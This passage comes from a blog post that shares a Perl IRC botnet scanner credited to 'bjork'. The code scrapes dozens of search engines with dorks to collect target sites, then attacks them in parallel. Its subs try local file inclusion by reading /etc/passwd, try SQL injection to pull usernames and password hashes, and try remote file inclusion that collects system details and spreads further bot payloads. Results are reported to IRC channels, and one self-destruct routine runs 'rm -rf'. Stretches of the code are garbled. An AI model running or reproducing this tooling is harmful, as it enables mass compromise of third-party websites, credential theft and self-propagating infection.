writ2(" 12,1( 3uname -a 12) 12 $un 12( 3uid 12) 12 $id1 ");
if ($spreadACT == 1) {
writ1(" 12,1[+] 12Trying to spread .. ");
sleep(2);
my $test2 = "http://".$site.$bug.$spread."?";
&query($test2);
my $test3 = "http://".$site.$bug.$pbot."?";
&query($test3);
my $test4 = "http://".$site.$bug.$pbot."?";
&query($test4);
}
}
elsif ($re =~ /bjork/) {
os($test);
writ1(" 12,1( 12,4safe: ON 12) ( 12,4os: $os 12) 12,4$print ");
#writ1(" 12,1( 12,4uname -a 12) 12 $un ");
#writ1(" 12,1( 12,4hdd space 12) 12 free: ($free) used: ($used) tot: ($all) ");
#writ2("");
#writ2(" 12,1( 12,4safe: ON 12) ( 12,4os: $os 12) 12,4$print ");
if ($spreadACT == 1) {
writ1(" 12,1[+] 12Trying to spread .. ");
sleep(2);
my $test2 = "http://".$site.$bug.$spread."?";
&query($test2);
my $test3 = "http://".$site.$bug.$pbot."?";
&query($test3);
my $test4 = "http://".$site.$bug.$pbot."?";
&query($test4);
}
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}

sub lfi() {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my @forks;
my $num = 0;
open($file, "<", $name); while (my $a = <$file>) {
$a =~ s/\n//g;
push(@tot, $a);
}
close($file);
remove($name);
my @toexploit = unici(@tot);
writ1(" 12,1[*] 4,1>EXPLOITABLES: 3,1 ".scalar(@toexploit)." 12,0 $dork ");
writ1(" 4,1[+] 12ExPLoItIng STARTED !! ");
foreach my $site(@toexploit) {
$count++;
if ($count % 100 == 0) {
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
if ($count % 300 == 0) {
writ1(" 12,1[%] 12,0 _/ Exploiting 4,1 ".$count." / 4,1 ".scalar(@toexploit)." ");
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $inj = "../../../../../../../../../../../../../etc/passwd";
my $test = "http://".$site.$bug.$inj;
my $print = "http://".$site.$bug.$inj;
my $re = query($test);
if ($re =~ /root:x:/) {
writ1(" 7( 7,1LFI 7) 12$print ");
writ2(" 7( 7,1LFI 7) 12$print ");
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}

sub sql() {
my $bug = $_[0];
my $name = $_[1];
my $dork = $_[2];
my $sqlpid = $_[3];
my @forks;
my $num = 0;
open($file, "<", $name); while (my $a = <$file>) {
$a =~ s/\n//g;
push(@tot,$a);
}
close($file);
remove($name);
my @toexploit = unici(@tot);
writ1(" 12,1[*] 4,1>EXPLOITABLES: 3,1 ".scalar(@toexploit)." 12,0 $dork ");
writ1(" 4,1[+] 12ExPLoItIng STARTED !! ");
foreach my $site(@toexploit) {
my $test = "http://".$site.$bug; print "$test\n";
$count++;
if($count %$sqlpid == 0){
foreach my $f(@forks){
waitpid($f,0);
}
$num = 0;
}
if($count %100 == 0){
writ1(" 12,1[%] 12,0 _/ Exploiting 4,1 ".$count." / 4,1 ".scalar(@toexploit)." ");
}
$forks[$num]=fork();
if($forks[$num] == 0){
my $test = "http://".$site.$bug;
my $print = "http://".$site.$bug;
my $re = query($test);
if ($re =~ m/\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
if ($sqlpid == $sqlpidpr0c) {
writ1(" 9( 122SQL INJ 9) 12,02$print ");
writ1(" 9( 122User 9) 12,02$user ");
writ1(" 9( 122Hash 9) 12,02$hash ");
writ2(" 9( 122SQL INJ 9) 12,02$print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1(" 9( 122SQL INJ 9) 12,02$print ");
}
}
elsif ($re =~ m/:(.*)([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
$user =~ s/\<(.*)\>//g;
if ($user !~ /(\/|\<|\>|\")/) {
if ($sqlpid == $sqlpidpr0c) {
writ1(" 9( 122SQL INJ 9) 12,02$print ");
writ1(" 9( 122User 9) 12,02$user ");
writ1(" 9( 122Hash 9) 12,02$hash ");
writ2(" 9( 122SQL INJ 9) 12,02$print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1(" 9( 122SQL INJ 9) 12,02$print ");
}
}
}
elsif ($re =~ m/\"option\">(.*)([0-9,a-f]{32})/g) {
my ($user,$hash) = ($1,$2);
$user =~ s/<(.*)>//g;
$user =~ s/<|>//g;
if ($sqlpid == $sqlpidpr0c) {
writ1(" 9( 122SQL INJ 9) 12,02$print ");
writ1(" 9( 122User 9) 12,02$user ");
writ1(" 9( 122Hash 9) 12,02$hash ");
writ2(" 9( 122SQL INJ 9) 12,02$print ");
}
elsif ($sqlpid > $sqlpidpr0c) {
writ1(" 9( 122SQL INJ 9) 12,02$print ");
}
}
exit(0);
}
$num++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}

sub G_Super() {
my @domain = ("at","com.au","com.br","ca","ch","cn","de","dk","es","fr","it","co.jp","com.mx","co.uk");
my @langs = ("de","en","br","en","de","cn","de","dk","es","fr","it","jp","es","en");
my @country = ("AT","AU","BR","CA","CH","CN","DE","DK","ES","FR","IT","JP","MX","UK");
my $dork = $_[0];
my $fname = $_[1];
my @forks;
my $count = 0;
my $dd = 0;
my $l = 0;
my $c = 0;
foreach my $d(@domain) {
if ($count % 1 == 0) {
foreach my $f(@forks){
waitpid($f,0);
}
}
$forks[$count] = fork();
if ($forks[$count] == 0) {
for ($i=0;$i<=1000;$i+=100) { my $gsup = ("www.google.".$d."/search?q=".key($dork)."&num=100&hl=".$langs[$l]."&cr=country".$country[$c]."&as_qdr=all&start=".$i."&sa=N"); my $re = query1($gsup); while ($re =~ m/<|>/) {
push(@sgrep,$h);
}
}
}
my @list = &fprint($fname,@sgrep);
writ1(" 12,1[*] 4,1>GOOGLE[ 12".$domain[$dd]." 4,1] : ".scalar(@list)." 12 > 12,0 $dork ");
exit(0);
}
$l++;
$c++;
$count++;
$dd++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}

sub A_Super() {
my $dork = $_[0];
my @d00rk = ("at","com.au","com.br","ca","ch","cn","de","dk","es","fr","it","com.mx","co.uk");
my $fname = $_[1];
my @forks;
my $count = 0;
my $dd = 0;
foreach my $d(@d00rk) {
my $d0rk = "$dork domain:".$d00rk[$dd];
if ($count % 1 == 0) {
foreach my $f(@forks){
waitpid($f,0);
}
}
$forks[$count] = fork();
if ($forks[$count] == 0) {
for ($i=0;$i<=1000;$i+=100) { my $asup = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($d0rk)."&o=".$i); my $re = query($asup); while ($re =~ m/http:\/\/(.+?) <\/span>/g) {
my $h = $1;
if ($h !~ /youtube|wikipedia/) {
push(@sgrep,$h);
}
}
}
my @list = &fprint($fname,@sgrep);
writ1(" 12,1[*] 4,1>ALLTHEWEB[ 12".$d00rk[$dd]." 4,1] : ".scalar(@list)." 12 > 12,0 $dork ");
exit(0);
}
$count++;
$dd++;
}




foreach my $f(@forks){
waitpid($f,0);
}
}

sub Y_Super() {
my @domain = ("at","au","br","ca","de","es","fr","it","uk");
my $dork = $_[0];
my $fname = $_[1];
my @forks;
my $count = 0;
my $dd = 0;
foreach my $d(@domain) {
if ($count % 1 == 0) {
foreach my $f(@forks){
waitpid($f,0);
}
}
$forks[$count] = fork();
if ($forks[$count] == 0) {
for ($i=0;$i<=1000;$i+=100) { my $ysup = ("http://".$d.".search.yahoo.com/search?p=".key($dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=".$i); my $re = query($ysup); while ($re =~ m//g) {
my $h = $1;
if ($h !~ /yahoo|<|>/) {
push(@sgrep,$h);
}
}
}
my @list = &fprint($fname,@sgrep);
writ1(" 12,1[*] 4,1>YAHOO[ 12".$domain[$dd]." 4,1] : ".scalar(@list)." 12 > 12,0 $dork ");
exit(0);
}
$count++;
$dd++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}

sub M_Super() {
my @domain = ("at","au","br","ca","de","fr","it");
my $dork = $_[0];
my $fname = $_[1];
my @forks;
my $count = 0;
my $dd = 0;
foreach my $d(@domain) {
my $d0 = "$d-$d";
if ($count % 1 == 0) {
foreach my $f(@forks){
waitpid($f,0);
}
}
$forks[$count] = fork();
if ($forks[$count] == 0) {
for ($i=1;$i<=501;$i+=10) { my $msup = ("http://search.live.com/results.aspx?q=".key($dork)."&first=".$i."&FORM=PERE&FORM=MSNH&mkt=".$d0."&setlang=".$d0); my $re = query($msup); while ($re =~ m/MSN[ 12".$domain[$dd]." 4,1] : ".scalar(@list)." 12 > 12,0 $dork ");
exit(0);
}
$count++;
$dd++;
}
foreach my $f(@forks){
waitpid($f,0);
}
}

sub google() {
my @gsites;
my $dork = $_[0];
my $name = $_[1];
my $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N");
my $re = query1($gtest);
if ($re =~ /Google Home/) {
@gsites = gfind($dork,$name);
}
else {
writ1(" 4,1[!] 4,1Banned by Google Engine, BYPASS started ! ");
@gsites = gbypass($dork,$name);
}
return @gsites;
}

sub gfind() {
my $dork = $_[0];
my $name= $_[1];
for ($i = 0;$i <= 1200; $i += 100) { my $glink = ("www.google.it/search?q=".key($dork)."&num=100&hl=it&as_qdr=all&start=".$i."&sa=N"); my $re = query1($glink); while ($re =~ m/\"]*)\//g) {
my $h = $1;
if ($h !~ /google/) {
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub gbypass() { # Euroseek uses the same search type of google
my $dork = $_[0];
my $name = $_[1];
for ($i = 0 ;$i <= 1000 ;$i += 10) { my $gplink = ("http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$i."&string=".key($dork)); my $re = query($gplink); while ($re =~ m//g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub alltheweb() {
my $dork = $_[0];
my $name = $_[1];
for ($i = 0;$i <= 1000;$i += 100) { my $alink = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($dork)."&o=".$i); my $re = query($alink); while ($re =~ m/http:\/\/(.+?)\<\/span>/g) {
my $h = $1;
$h =~ s/ //g;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub altavista() {
my $dork = $_[0];
my $name = $_[1];
my $atest = ("http://it.altavista.com/web/results?itag=ody&q=".key($dork)."&kgs=0&kls=1");
my $re = query($atest);
if ($re =~ /Sono stati trovati 0 risultati/) {
return @list;
}
else {
for ($i = 0;$i <= 1000;$i += 50){ my $alink = ("http://it.altavista.com/web/results?itag=ody&kgs=0&q=".key($dork)."&stq=".$i); my $re = query($alink); while ($re =~ m/(.+?)<\/span>/g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub msn() {
my $dork = $_[0];
my $name = $_[1];
for ($i = 1;$i <= 800;$i += 10) { my $mlink = ( "http://search.live.com/results.aspx?q=".key($dork)."&first=".$i."&FORM=PERE" ); my $re = query($mlink); while ($re =~ m/\"]*)\//g) {
my $h = $1;
if ($h !~ /msn|live/ ) {
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub yahoo() {
my @ysites;
my $dork = $_[0];
my $name = $_[1];
my $ytest = ("http://search.yahoo.com/search?p=".key($dork)."&fr=yfp-t-501&ei=UTF-8&rd=r1");
my $re = query($ytest);
if ($re =~ /We did not find results for: /) {
return @ysites;
}
elsif ($re =~ /Yahoo! Search results/) {
@ysites = yfind($dork,$name);
return @ysites;
}
else {
writ1(" 4,1[!] 4,1Banned by Yahoo Engine, BYPASS started! ");
@ysites = ybypass($dork,$name);
return @ysites;
}
}

sub yfind() {
my $dork = $_[0];
my $name = $_[1];
for ($i = 1;$i <= 901;$i += 100) { my $ylink = ("http://search.yahoo.com/search?p=".key($dork)."&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=r&fl=0&fr=yfp-t-501&pstart=1&b=".$1); my $re = query($ylink); while ($re =~ m//g) {
my $h = $1;
if ($h !~ /yahoo|<|>/) {
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub ybypass() { # GoodSearch uses the same search type of Yahoo
my $dork = $_[0];
my $name = $_[1];
my $ybytest = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($dork)."&page=1&osmax=16");
my $re = query($ybytest);
if ($re =~ /Your search did not yield any results/){
return @list;
}
else {
for $i(1..50){
my $ybylink = ("http://www.goodsearch.com/Search.aspx?Keywords=".key($dork)."&page=".$i."&osmax=16");
my $re = query($ybylink);
while ($re =~ m/href=\"(.+?)\">(.+?)<\/a>/g) {
my $h = $2;
if (($h =~ /\./) && ($h !~ /<|>| /)){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}


sub gigablast() {
my $dork = $_[0];
my $name = $_[1];
my $gtest = ("http://www.gigablast.com/index.php?n=10&k5p=215334&q=".key($dork)."&submit.x=0&submit.y=0");
my $re = query($gtest);
if ($re =~ /No results found for/){
return @list;
}
else {
for ($i = 0; $i <= 1000; $i += 10) { my $glink = ("http://www.gigablast.com/index.php?q=".key($dork)."&submit_x=929&submit_y=168&k9j=686621&s=".$i."&n=10&"); my $re = query($glink); while ($re =~ m/href=\"http:\/\/(.+?)\">/g) {
my $h = $1;
if ($h !~ /web\.archive|gigablast/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub ask() {
my $dork = $_[0];
my $name = $_[1];
my $atest = ("http://it.ask.com/web?q=".key($dork)."&qsrc=1&o=312&l=dir&dm=all");
my $re = query($atest);
if ($re =~ /non ha prodotto alcun risultato/) {
return @list;
}
else {
for ($i = 0;$i <= 20;$i ++){ my $alink = ("http://it.ask.com/web?q=".key($dork)."&o=0&l=dir&qsrc=0&qid=612B74535B00F6CA7678625658F9B98C&dm=all&page=".$i); my $re = query($alink); while($re =~ m/href=\"http:\/\/(.+?)\"/g){ my $h = $1; if ($h !~ /ask|wikipedia/){ push(@sgrep,$h); } } } my @list = fprint($name,@sgrep); return @list; } } ## Aol doesn't work, don't know why. When i try to make a http request on aol host, this is the message that i received: You don't have permission to access /aol/search ## Don't know hot to fix it :S Anyway you have here the sub, so you can try to fix this problem sub aol() { my $dork = $_[0]; my $name = $_[1]; my $atest = ("http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=".key($dork)); my $re = query($atest); if ($re =~ /returned no results\.<\/h3>/) {
return @list;
}
else {
for $i(1..100){
my $alink = ("http://search.aol.com/aol/search?query=".key($dork)."&page=".$i."&nt=SG2&do=Search&invocationType=comsearch30&clickstreamid=3154480101243260576");
my $re = query($alink);print "$re\n";
while($re =~ m/\"deleted\" property=\"f:url\">http:\/\/(.+?)<\/p>/g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub dmoz() {
my $dork = $_[0];
my $name = $_[1];
my $dtest = ("http://search.dmoz.org/cgi-bin/search?search=".key($dork));
my $re = query($dtest);
if ($re =~ m/No Open Directory Project<\/a><\/b> results found/g){
return @list;
}
elsif ($re =~ /of (.+?)\)
/){
my $ftot = $1;
if ($ftot <= 20) { $max = 1; } else { my $to = $ftot / 20; if ($to =~ /(.+).(.+?)/){ $uik = $1 * 20; $max = $uik +1; } elsif ($to =~ /[0-9]/) { my $to--; my $rej = $to * 20; $max = $rej +1; } } } for ($i = 1;$i <= $max;$i += 20){ my $dlink = ("http://search.dmoz.org/cgi-bin/search?search=".key($dork)."&utf8=1&locale=it_it&start=".$i); my $re = query($dlink); while($re =~ m/<= 100;$i +=10) { my $wlink = ("http://suche.web.de/search/web/?pageIndex=".$i."&su=".key($dork)."&y=0&x=0&mc=suche@web@navigation@zahlen.suche@web"); my $re = query($wlink); while($re =~ m/http:\/\/(.*?)<\/span>/g) {
my $h = $1;
if ($h !~ /\/search\/web|web.de|\" class=\"neww\"/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub einet() {
my $dork = $_[0];
my $name = $_[1];
my $etest = ("http://www.einet.net/view/search.gst?p=1&k=".key($dork)."&s=0&submit=Search");
my $re = query($etest);
if ($re =~ /Page 1 of\s+(.+?)<\/span>/){
my $tot = $1;
for ($i = 1;$i <= $tot;$i++){ my $elink = ("http://www.einet.net/view/search.gst?p=".$i."&k=".key($dork)."&s=0&submit=Search"); my $re = query($elink); while($re =~ m/\s+(.+?)<\/span>/g) {
my $h = $1;
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub uol() {
my $dork = $_[0];
my $name = $_[1];
my $utest = ("http://busca.uol.com.br/www/index.html?q=".key($dork)."&ad=on");
my $re = query($test1);
if ($re =~ /n??o retornou nenhum resultado/) {
return @list;
}
else {
for($i = 0;$i <= 360;$i +=10) { my $uollink = ("http://busca.uol.com.br/www/index.html?ad=on&q=".key($dork)."&start=".$i); my $re = query($uollink); while($re =~ m/





/g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub abacho() {
my $dork = $_[0];
my $name = $_[1];
my $atest = ("http://search.abacho.com/it/abacho.it/index.cfm?q=".key($dork)."&country=it&x=0&y=0");
my $re = query($atest);
if ($re =~ /We didn't find any results matching your query/) {
return @list;
}
else {
for ($i = 0;$i <= 1000; $i += 10) { my $alink = ("http://search.abacho.com/it/abacho.it/index.cfm?offset=".$i."&poffset=0&StartCounter=".$i."&q=".key($dork)."&a=&b=&country=it&page=&d_html=&d_pdf=&d_msdoc=&d_xls=&d_ppt=&mesearchkey=&cluster=&coop="); my $re = query($alink); while ($re =~ m/target=\"_blank\">http:\/\/(.+?)<\/a>/g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub trovatore() {
my $dork = $_[0];
my $name = $_[1];
my $ttest = ("http://213.215.201.230/search.jsp?query=".key($dork)."&langselect=all&hitsPerPage=10&hitsPerSite=1&clustering=&filterResults=null&start=0");
my $re = query($ttest);
if ($re =~ /Risultati 0-0<\/b>/) {
return @list;
}
else {
for ($i = 0;$i <= 2500; $i += 10) { my $tlink = ("http://213.215.201.230/search.jsp?query=".key($dork)."&langselect=all&hitsPerPage=10&hitsPerSite=1&clustering=&filterResults=null&start=".$i); my $re = query($tlink); while($re =~ m//g) {
my $h = $1;
if ($h !~ /iltrovatore\.it|213\.215\.201\.230|microsoft|wikipedia/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub lycos() {
my $dork = $_[0];
my $name = $_[1];
my $ltest = ("http://cerca.lycos.it/cgi-bin/pursuit?pag=0&query=".key($dork)."&cat=web&enc=utf-8&xargs=");
my $re = query($ltest);
if ($re =~ /non ha avuto esito positivo tra/) {
return @list;
}
else {
for $i(0..79) {
my $llink = ("http://cerca.lycos.it/cgi-bin/pursuit?pag=".$i."&query=".key($dork)."&cat=web&enc=utf-8");
my $re = query($llink);
while($re =~ m/title=\"\" >http:\/\/(.+?)<\/a>/g) {
my $h = $1;
if ($h !~ /youtube|google|wikipedia|microsoft/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub walhello() {
my $dork = $_[0];
my $name = $_[1];
my $wtest = ("http://www.walhello.info/search?key=".key($dork)."&taal=a&nummer=0&&web=no&&vert=2&");
my $re = query($wtest);
if ($re =~ /Verzeihung, Nichts gefunden/) {
return @list;
}
else {
for $i(0..99) {
my $wlink = ("http://www.walhello.info/search?key=".key($dork)."&taal=a&nummer=".$i."&&web=no&&vert=2&");
my $re = query($wlink);
while($re =~ m//g) {
my $h = $1;
if ($h !~ /walhello|microsoft|wikipedia/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub virgilio() {
my $dork = $_[0];
my $name = $_[1];
my $vtest = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&Cerca=&lr=");
my $re = query($vtest);
if ($re =~ /Controlla che tutte le parole siano state digitate correttamente<\/span>/) {
return @list;
}
else {
for ($i = 0;$i <= 800; $i += 10) { my $vlink = ("http://ricerca.alice.it/ricerca?qs=".key($dork)."&filter=1&site=&lr=&hits=10&offset=".$i); my $re = query($vlink); while($re =~ m//g) {
my $h = $1;
if ($h !~ /microsoft|wikipedia/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}
}

sub mamma() {
my $dork = $_[0];
my $name = $_[1];
for ($i = 0;$i <= 1000; $i += 50) { my $mmlink = ("http://mamma.com/Mamma?utfout=1&query=".key($dork)."&qtype=0&rpp=50&cb=Mamma&index=".$i); my $re = query($mmlink); while($re =~ m/http:\/\/(.+?)\<\/span>/g) {
my $h = $1;
push(@sgrep,$h);
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub hotbot() {
my $dork = $_[0];
my $name = $_[1];
for ($i = 0;$i < hblink =" (" query=".key($dork)." ps="&loc=" tab="web&mode=" currprov="msn&page=" re =" query($hblink);" re ="~">< cllink =" (" query=".key($dork)." state="root|root-" re =" query($cllink);" re ="~">\"]*)/g) {
my $h = $1;
if ($h !~ /clusty/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub webcrawler() {
my $dork = $_[0];
my $name = $_[1];
my $b = 0;
for ($i = 0;$i <= 5000; $i += 100) { $b++; my $wclink = ("http://www.webcrawler.com/webcrawler/ws/redir/qcat=Web/qkw=".key($dork)."/qcoll=relevance/zoom=off/bepersistence=true/qi=".$i."/qk=50/page=".$b."/_iceUrlFlag=11?_IceUrl=true"); my $re = query($wclink); while($re =~ m/http:\/\/(.*?)/g) { my $h = $1; if ($h !~ /webcrawler|google/){ push(@sgrep,$h); } } } my @list = fprint($name,@sgrep); return @list; } sub fazzle() { my $dork = $_[0]; my $name = $_[1]; for ($i = 0;$i <= 10; $i++) { my $fzlink = ("http://www.fazzle.com/search?SearchString=".key($dork)); my $re = query($fzlink); while($re =~ m/<= 10; $i++) { my $ablink = ("http://search.about.com/fullsearch.htm?terms=".key($dork)."&pg=".$i."&SUName=www"); my $re = query($ablink); while($re =~ m/<= 10; $i++) { my $nslink = ("http://search.netscape.com/search/search?query=".key($dork)."&page=".$i."&y=0&x=0&st=webresults"); my $re = query($nslink); while($re =~ m/url\">http:\/\/(.*?)<\/p>/g) {
my $h = $1;
if ($h !~ /search.netscape/){
push(@sgrep,$h);
}
}
}
my @list = fprint($name,@sgrep);
return @list;
}

sub infospace() {
my $dork = $_[0];
my $name = $_[1];
for ($i = 0;$i <= 5; $i++) { my $islink = ("http://msxml.infospace.com/home/search/web/".key($dork)); my $re = query($islink); while($re =~ m/rawto=http:\/\/(.*?)/g) { my $h = $1; if ($h !~ /infospace/){ push(@sgrep,$h); } } } my @list = fprint($name,@sgrep); return @list; } sub fireball() { my $dork = $_[0]; my $name = $_[1]; for ($i = 0;$i <= 200; $i++) { my $fblink = ("http://suche.fireball.de/cgi-bin/pursuit?pag=".$i."&query=".key($dork)."&cat=fb_web&enc=utf-8"); my $re = query($fblink); while($re =~ m/>", $name);
foreach my $h(@list) {
print $file "$h\n";
}
close($file);
return @list;
}

sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push(@l, $link, $host, $hdir);
return @l;
}

sub unici {
my @unici = ();
my %visti = ();
foreach my $elemento (@_) {
$elemento =~ s/\/+/\//g;
next if $visti{$elemento}++;
push @unici, $elemento;
}
return @unici;
}

sub os() {
my $site = $_[0];
my $re = &query($site);
while ($re =~ m/
uname -a:(.+?)\
/g) {
$un = $1;
}
while ($re =~ m/
os:(.+?)\
/g) {
$os = $1;
}
while ($re =~ m/
id:(.+?)\
/g) {
$id1 = $1;
}
while ($re =~ m/
free:(.+?)\
/g) {
$free = $1;
}
while ($re =~ m/
used:(.+?)\
/g) {
$used = $1;
}
while ($re =~ m/
total:(.+?)\
/g) {
$all = $1;
}
}

sub cheek() {
if (($auth !~ /bjork/)||($authmail !~ /bjork/)) {
print "\nI hate rippers, before putting your nick on a script, be sure that you coded it!\nby bjork // idiot slow down\n\n";
exec("rm -rf $0 && pkill perl");
}
}

sub query() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}

sub query1() {
my $url = $_[0];
my $host = $url;
my $query = $url;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
eval {
my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
close($sock);
};
return $page;
}

sub writ1() {
my $cont = $_[0];
print $c0n "PRIVMSG $chan1 :$cont\n";
}

sub writ2() {
my $cont = $_[0];
print $c0n "PRIVMSG bjork :$cont\n";
}

sub pm() {
my $nick = $_[0];
my $cont = $_[1];
print $c0n "PRIVMSG $nick :$cont\n";
}
## PRIVATE
## Coded by bjork

Posted in:

0 comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Twitter Delicious Facebook Digg Stumbleupon Favorites More